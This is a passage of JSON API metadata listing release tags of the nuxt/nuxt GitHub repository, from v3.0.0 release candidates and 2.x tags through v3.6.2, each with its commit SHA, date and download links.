.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/